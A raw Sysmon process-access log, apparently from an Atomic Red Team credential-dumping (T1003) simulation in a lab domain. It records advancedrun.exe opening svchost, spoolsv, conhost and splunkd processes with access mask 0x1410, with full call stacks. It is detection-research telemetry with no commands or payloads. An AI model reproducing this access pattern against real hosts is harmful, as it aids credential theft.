17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 